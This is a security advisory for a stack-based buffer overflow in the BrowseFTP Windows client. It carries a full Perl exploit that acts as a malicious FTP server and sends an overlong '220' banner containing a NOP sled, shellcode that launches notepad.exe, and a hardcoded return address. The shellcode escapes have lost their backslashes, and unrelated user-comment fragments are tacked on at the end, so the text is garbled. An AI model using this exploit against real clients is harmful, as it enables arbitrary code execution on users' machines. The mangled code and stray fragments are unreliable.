source: http://www.securityfocus.com/bid/3781/info
BrowseFTP is an ftp client that runs on various Microsoft Windows operating systems.
An issue has been reported which could allow for a malicious ftp server to execute arbitrary code on a BrowseFTP client user.
This is acheivable when a BrowseFTP user connects to an ftp host, if the FTP server '220' response is of excessive length. The stack-based overflow condition can allow for malicious administrators to execute arbitrary code on (and gain control of) client hosts. It is also possible to crash the client.
#!/usr/local/bin/perl
#------------------------------------------------------------------------
# Browse FTP exploit( run under inetd )
# written by Kanatoko
# http://www.jumperz.net/
#------------------------------------------------------------------------
$|=1;
#egg written by UNYUN (http://www.shadowpenguin.org/)
$egg = "xEBx22x5Bx53x32xE4x83xC3x0Bx88x23xB8x24x98x01x78";
$egg .= "xFFxD0x33xC0x50xB4x78xC1xE0x10x33xDBx66xBBx04x55";
$egg .= "x0BxC3xFFxD0xE8xD9xFFxFFxFF";
$egg .= "notepad.exe";
#018DFB20
$ret = "x20xFBx8Dx01";
$buf = "x90" x 2428;
$buf .= $egg;
$buf .= "A" x 299;
$buf .= $ret;
print "220 $bufrn";
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666